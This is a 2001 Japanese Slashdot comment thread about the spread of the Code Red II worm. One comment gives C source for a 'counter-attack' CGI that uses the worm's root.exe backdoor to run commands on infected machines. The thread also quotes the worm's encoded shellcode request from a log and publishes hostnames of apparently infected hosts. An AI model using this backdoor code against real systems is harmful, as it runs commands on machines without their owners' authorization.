Code Redのより凶悪な変種が発生 197
ストーリー by Oliver
進化の行き着く先は 部門より
進化の行き着く先は 部門より
Bellz 曰く,"サーバーのログ調査中にCode Redに似てるけど今までとすこし違うアタックを発見。調べたところ、半日ほど前から発生しているCode Redの新種のようです。これによると現時点で分かっているのはバックドアを仕込むことと、増殖ペースがいままで以上に速いということらしいです。うちのログによると32回連続してリクエストをかけてくるのでDoSの影響もでるみたいです。このアタックの影響でうちのネットワークにかなり負荷がかかっています(T_T)"
でも、結局は同じセキュリティホールを突いてきているので、対策していれば心配なさそう。いまさら「まだ何もしてませんでした」なんてのは許されない。
IISを使いつづけることは善か悪か (スコア:2)
マイクロソフトの責任も重大だ。
とりあえずこの新種はマイクロソフトIISワームと呼ぶことにすれば?
210.xxx.xxx.xxxを集中的にアタック (スコア:2, 参考になる)
Re:210.xxx.xxx.xxxを集中的にアタック (スコア:2, 参考になる)
Re:攻性防御ワームをつくれないのかな… (スコア:2)
default.idaを置いてみました (スコア:2, 参考になる)
38番の発言のところに書いてあったURIを覗いていたら、default.idaというファイルを置いておくと持って行ってくれるという話が載っていたので、試しに警告メッセージをHTMLにしたものをdefault.idaとして、自分の鯖に置いてみました。
でも、もしこのファイルを持って行ってくれたとしても、管理者が読んでくれるかどうか……多分、読まれないんだろうなぁ。
Re:IISを使いつづけることは善か悪か (スコア:2, おもしろおかしい)
殆どのウィルス・ワームが同じ名前になっちゃいそう(^^;
Re:ひどい状態っす (スコア:2, 興味深い)
Redirect permanent /default.ida http://www.microsoft.com/
と書いて apache 再起動したりしてみました。
まあログが増えることの解決にはならないし
ネットワーク上のトラフィックは
無駄に2倍になっちゃうのかもしれませんが...
Re:サーバでなくてもIIS入ってれば感染するかも? (スコア:2)
たしかその通り。あ、ただし、セットアップして入れないと入らないかな。デフォルトではインストールされないはずです。ただし、NT4みたいにServerはIIS/WSはPWSという区別はなくなってます。プレインストールモデルではどうなっているか要チェックでしょう。
ついでに (スコア:2, おもしろおかしい)
Re:お手軽SIerにとっては (スコア:2)
Re:劇薬が必要 (スコア:2)
それで良いんではないかと。
つまり、相対的に高価なソフトウェアに対し、
「高価であるから、何かあった時に金をふんだくれるから安心」
と考え、逆に低価なソフトウェアに対しては、
「低価であるのはつまり、その安全性に自信があるからで、こちらのほうが安心」
と考える。どちらも判断基準としてありえるわけです。
-+- 想像力を超え「創造力」をも凌駕する、それが『妄想力』!! -+-
Re:サーバでなくてもIIS入ってれば感染するかも? (スコア:2)
Re:まだ、報道されてないねぇ (スコア:2)
しかも「SymantecはCodeRed.v3を発見したと発表した」という扱い。
緊張感ないなあ…。(--;)
海外だとCNETが記事を載せたようです。
Re:わき道にそれますが・・・ (スコア:2)
Re:back door (スコア:2, 興味深い)
うーん、被感染サーバを持っていないので、本物でテストしてないけど、こんなところでいいのかな?
著作権主張もしません。
char msg[] = の所は改行を入れずに書いてね。
>モデレータの方、もしこういうコード公開がまずかったら削除してください。
/* messaging defult.ida for Code Red III */
/* Tested on Linux 2.2 with libc5 */
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
/* backdoor port */
#define WWW 80
/* backdoor command */
#define CMD "POST /scripts/root.exe HTTP/1.0\r\nContent-Length: %d\r\n\r\n"
char buf[1024];
/* Messge to popup */
char msg[] = "NET SEND localhost \"***WARNING*** Your computer seems to be cracked by Code Red III. This message has been sent thru the backdoor of it. So, YOU MUST CLEAN UP YOUR SYSTEM. For more information, please check the following URL: http://www.incidents.org/react/code_red.php\"\r\n";
struct sockaddr_in addr;
struct hostent *host;
int open_sock(int sock, char *server, int port)
{
struct sockaddr_in addr;
struct hostent *dest;
bzero((char *)&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(server);
addr.sin_port = htons(port);
if ((dest = gethostbyname(server)) != NULL) {
bcopy(dest->h_addr, (char *)&addr.sin_addr, dest->h_length);
}
else if ((addr.sin_addr.s_addr = inet_addr(server)) < 0) {
perror("gethostbyname()");
return (-1);
}
if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
perror("connect()");
close(sock);
return (-2);
}
return 0;
}
int main(int argc, char *argv[])
{
int s;
int l;
char *remote_addr;
/* CGI response header */
printf("Location: http://www.microsoft.com/\n\n"); /* Redirect :-) */
/* Check remote addr */
if ((remote_addr = getenv("REMOTE_ADDR")) == NULL) {
exit(0);
}
/* Open socket */
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
exit(0);
}
if (open_sock(s, remote_addr, WWW) < 0) {
exit(0);
}
/* Make request */
l = snprintf(buf, sizeof(buf), CMD, strlen(msg));
/* Send Request */
send(s, buf, l, 0); /* POST Command / Length Header */
send(s, msg, strlen(msg), 0); /* Message */
/* Close */
close(s);
return 0;
}
kaokun
Re:まだ、報道されてないねぇ (スコア:2, 参考になる)
Code Red IIについての警告
**たこさん**・・・
Re:「サイバー正当防衛」は認められるか? (スコア:2, おもしろおかしい)
あまりにウザいので、反撃CGIでも作るかな‥‥。
(本当に作るべきはパッチ当てウィルスだろうけれども、win方面の知識が薄いので。)
とは言え、何で反撃すれば面白くなるだろうか。
既にトロイが動作しているので、アクセスしてきた相手には何でも出来るのだが‥‥。
無難なのはやっぱり
という手順を、バックドアを通して実行させるCGIか。
‥‥なんで其処までやってやらないといかんのだ。
Re:back door (スコア:2, すばらしい洞察)
usleep(500000); /* wait 0.5 Sec */
を入れるとか。
あんまり入れると逆襲 CGI でサーバの負荷が高くなるので考え物だけど。
kaokun
まだまだ来てます (スコア:2)
被害はまだまだ拡大しているのか、こんな↓記事が
日本ベリサインのWebサイトに不正アクセス--トップページ書き換え
「コード・レッド」韓国の官庁間ネットワークに感染
CodeRedの攻撃でルータも悲鳴
ついでにこういう↓記事も
Code Redでも問題に――頭の痛いバッファオーバーラン
しかし、バッファーオーバーフローが「その多くはMicrosoftの技術に起因するという」のは知らなかった(笑)
Re:まだまだ来てます (スコア:2)
ところで、無粋なコメントになっちゃうけど、
>>バッファーオーバーフローが「その多くはMicrosoftの技術に起因するという」のは知らなかった(笑)
>「その多くはMicrosoftの技術に未熟さに起因するという」のが正解だと思うけど。(笑)
のくだりは、英語で「Microsoft technology」と言うと単なる「Microsoft製の技術」「MS製品」みたいな意味なので、別にMSがせっせとBufferOverrun技術を開発してるということではないです。BufferOverrunバグの取れてない製品をせっせと開発しているんだけど。(笑)
ま、さすがにBufferOverrunが見つかる大部分はMS製品というのは誇張で例えばLWN.netあたりを見てれば他のプラットフォームでもBufferOverrunが日々様々見つかってるくらいはわかるはずなんだけど。
バッファーオーバーラン (スコア:2)
私はMicrosoft大嫌い、Java大好き人間だけど、これはいくらなんでも論理のすり替えが酷すぎると思う。
Re:今さら&既出ネタかも知れませんが、 (スコア:2)
WAKWAKってこういう料金体系なんだ。知らなかった。こういう環境で固定IPをもらっちゃうと、「気象デリバティブ」ならぬ「WORMデリバティブ」保険みたいなのが必要ですね。(笑)
Re:WAKWAKって、NTT-MEだよな (スコア:2)
Win2KPro 使ってます。 (スコア:2)
IISは入ってませんが、同様にクラックの対象となる「Indexing Service」が突っ込まれてます。
これは確か「標準」インストールで入りますし、特に設定を変えない限りは、
「常に」バックグランドでサービスとして稼動してるはずです。
依って、個人で常時接続しているマシンも思いっきり対象になります。
#自分は当然、インストール直後にサービス停止させてますし、
#パッチあて(HotFix?)も済ませてます。
#TrendMicroのチェッカーでも問題ないと診断されました。
#まあ、今後も引き続き安心できないんだけど(爆)
-+- 想像力を超え「創造力」をも凌駕する、それが『妄想力』!! -+-
本気か? (スコア:1)
攻撃されてます (スコア:1)
これだけ騒がれてて、まだ何もしないってど~ゆ~こと?
ちなみに会社のWebServer(Linux+Apache)にも昨晩から、default.idaへのアクセスが大量に来ております。
回線がそこそこ太いから、パフォーマンスが低下する程度で助かってますが、どーにかしてくれ~~~!!
新種の到着を確認しました。 (スコア:1)
ISDN?)から到着したのをかわきりにどんどん増えて
いるようです。
--- Lcs(http://lcs.myminicity.com/ [myminicity.com])
Apacheのログ (スコア:1)
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190
%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 271
↑こんなのが来てるんですけど、これ CodeRed ですか?
[udon]
Re:Apacheのログ (スコア:1)
ひどい状態っす (スコア:1)
スキャンするアドレスブロックが変わっているせい
か、国内感染もかなり増えているんじゃないかしら。
現在、自宅サーバでは一分に10回近くのスキャンが
来ているです。うが~。
みんつ
Re:ひどい状態っす (スコア:1)
GET /default.ida?
とかその他 asp 関連の GET が来たときにブッちぎる方法とか無いですかね?
CodeRed Type:X (スコア:1)
うち 68%が XXXXの新種でした。原種が駆逐される日は近いかも知れません。
しかし、それをも凌駕する Type:Z が密かに開発されつつあった... (大嘘(でもないかも))
Re:Apacheのログ (スコア:1)
む…わたしも、今日、ログをみていて「変種?」と思ってたけど、そうだったんですね。
ちなみにうちへの来訪は
210.85.202.71 - - [04/Aug/2001:20:10:12 +0900]
が最初でした。
しかも、それ以降は、原種 8件に対して新種 134件だったので
感染力が強いというのは確かなのかも
#今日も東京めたのネットワークは不調な気がする…
ウチもじゃぁ~~!! (スコア:1)
いい加減にして欲しいじょ~~~!!
ウチはADSLだから回線としてはそれなりなのかもしれないけど、サーバ自体がトロいのであっぷあっぷしてますぅ。
こういうのって、対策不備で訴えることできないのかなぁ……?
攻性防御ワームをつくれないのかな… (スコア:1)
ワームを送ってきたサーバに「IISをダウンさせるワーム」を逆に突っ込んでやりたくなるんだけど…
どっかに無いかな…>IISをダウンさせるワーム
#不要なアクセスログがどんどん増えて邪魔…
追加情報: CodeRedII では Solaris も target になり (スコア:1)
追加情報。
どうやら 新種のCodeRed (CodeRedII) は随分前に流行った sadmind worm と 同じ攻撃方法もしてくる様です。
この辺りを参照してください。
http://www.geocrawler.com/lists/3/SourceForge/4890/0/6330369/
http://ml-ar4.infoseek.co.jp/MLarchive//user/26603/html/msg000003729.php3
http://ml-ar4.infoseek.co.jp/MLarchive//user/26603/html/msg000003740.php3
stalk のアーカイブが遅い? 最新の記事が見えないー
Tatsuki Sugiura
Re:追加情報: CodeRedII では Solaris も target にな (スコア:1)
なるほど (スコア:1)
うちにも来ていますが、そんなに訪問客が多いわけでもないのでサーバスペックが低くてもそれほど気になりません。
それより問題なのは、元々の(Nでオーバーフローを狙う奴?)コードの時よりも国内ISPの下で立ち上げてるところからのアタックが増えてる感じがしてます。
プロバイダ側がチェックをしたほうがいいのかもしれませんが、だからって80番をブロックとかされると困るし。なにかいい防御方法があればいいのかもしれないけど、どうしたものか。
-- やさいはけんこうにいちば〜ん!
もしや… (スコア:1)
それより問題なのは、元々の(Nでオーバーフローを狙う奴?)コードの時よりも国内ISPの下で立ち上げてるところからのアタックが増えてる感じがしてます。
もしかして、今出ているMSのパッチを当ててもムダなワームかもしれないってこと???
対策不備 (スコア:1)
クラックされたIISを置いている会社や個人をですか?
難しいでしょうねぇ。数多くいる対象を個別に訴えなきゃならないから。
ちなみに今家に来ているののIPアドレスを逆引きしたら、大半が"Non-existent host/domain"だとさ(笑)
後は同じCATVインターネットに接続してる個人のマシンらしい(苦笑)。
日本の会社(Webアプリケーションの開発もやってるソフトハウス)に韓国の会社(石油販売らしい)が1件づつ。
日本の会社とCATVインターネットのプロバイダには、警告のメールしたけどね。
劇薬が必要 (スコア:1)
今までもウィルスやワームの被害に関して、パッチを当てないオーナー(メールソフトのユーザ、サーバソフトの管理者)が悪いって言われてきたけど、状況は全く改善されない。
もうそろそろメーカに何らかの責任を負わせてもいいころでは。オーナーへの通知義務とか、パッチの作成、配布義務とか。
IT、IT って言ってんだから、政府もそれなりの法改正したっていいよな。ログを取れとかわけのわからん法律作る前に。
国内プロバイダの機械? (スコア:1)
亜主からの攻撃を受けています。
これを見つけて/.Jにタレこもうかと思ったのが5日夕方さすが/.な人達(笑)既にタレこまれてた。
で、ログを見ると国内プロバイダの機械とおぼしき所からのアクセスが結構ありますね。
頭にくるから公開しちゃいます。
zaqd37c3ffb.zaq.ne.jp
nwtcc-11p187.ppp11.odn.ad.jp
zaqd37c3ffb.zaq.ne.jp
l025204.ppp.dion.ne.jp
d1.kuroiso.net
p0174-ip01kobeminato.hyogo.ocn.ne.jp
ntsrv02.onc.ne.jp
p103-dna13fudagi.aichi.ocn.ne.jp
n00036.max121.phs.yoyogi.mopera.ne.jp
p66-dna28nunoike.aichi.ocn.ne.jp
blizzarda066.nara-i.net
zaqd37c71b1.zaq.ne.jp
p91-dna10fudagi.aichi.ocn.ne.jp
d378c-105.et.tiki.ne.jp
以上アクセスの新しい順(笑)これらの機械の管理者に猛省を処す。
重蔵。
Re:劇薬が必要 (スコア:1)
IT、IT って言ってんだから、政府もそれなりの法改正したっていいよな。ログを取れとかわけのわからん法律作る前に。
それなんですよ。こういう事態に対しての法律がほしいんです>小泉さん。
ただ、前の方がおっしゃるように、こういう不特定多数の管理者相手に訴えを起こすことは、現実的には不可能なんですよねぇ。(;_;)
飛んできたログをみんなで持ち寄って、IPを特定して、全員訴えるってことができないものか……(こういうことを書くと、後で自分が訴えられる側に回るんだよなぁ)。
思いっきり間違っていましたね。 (スコア:1)
| 私には攻撃先 IP アドレスの選び方が Sadmind/IIS ワームに似ている
| としか読めなかったが。
失礼しました。That worm が CodeRedII の事だと阿呆な読み違いをしていました。 いやはや情けない……
結局「CodeRedII は CodeRed と同じく .ida へのアクセスした後、 sadmind/IIS worm の様に cmd.exe に対してアクセスをかけてくる。」 ってことのようですね。
Tatsuki Sugiura
サーバでなくてもIIS入ってれば感染するかも? (スコア:1)
新種はダイヤルアップユーザでも簡単に感染してしまうので、要注意ですよ。
okome
Re:劇薬が必要 (スコア:1)
管理者を対象にするんじゃなく、ソフトを作ってるベンダにパッチの作成、配布、通知義務、ISPに通知義務を課すと良いのでは。
個人を絞めても状況は変わらんと思う。
Re:劇薬が必要 (スコア:1)
管理者を対象にするんじゃなく、ソフトを作ってるベンダにパッチの作成、配布、通知義務、ISPに通知義務を課すと良いのでは。
それは当然必要なんですが、それだけじゃ足りないんですよ。前の“Outlook……”の件もありますが、あまりにも管理者のセキュリティ意識が低すぎます。自分が痛い目に遭わないから意識できないんですよね。一度痛い目を見せないとね。
Re:劇薬が必要 (スコア:1)
それは当然必要なんですが、それだけじゃ足りないんですよ。前の“Outlook……”の件もありますが、あまりにも管理者のセキュリティ意識が低すぎます。自分が痛い目に遭わないから意識できないんですよね。一度痛い目を見せないとね。
ではどうやって管理者を特定しましょうか。nic に登録されてるドメインの管理者は候補の一つですね。あと ISP との契約時に管理者を登録させるとか。
管理者の多くはやりたくてやってるんじゃないだろうから、罪に問われたひにゃあ...ビルにパイを投げる人間が続出しそう ^^;
東めた(おふとぴぎみ) (スコア:1)
# いつ頃回復するかメール打ったんだけど丸一日以上立ってるのに返答がこない・・・
うちは社内業務用にしか使ってないからまだいいけど、業務でWebを公開してるところはどうしてるんだろう・・・
末端のDHCPユーザーだから (スコア:1)
私はZAQユーザーなんですが、不正アクセスログ調べてたら、ZAQがDHCPに使っているURLがゴロゴロ出て来たので(苦笑)、ZAQのWebmaster宛てに連絡は入れておきました。
はたしてちゃんと警告文を送ってくれるかどうかは判りませんが。
#送るにしてもユーザー全員に「注意して下さい」メール送るだけだと、意味ないだろうなぁ。受け取っても「俺には関係ないな」って思う奴ばかりだろうしなぁ、感染してる奴って(爆)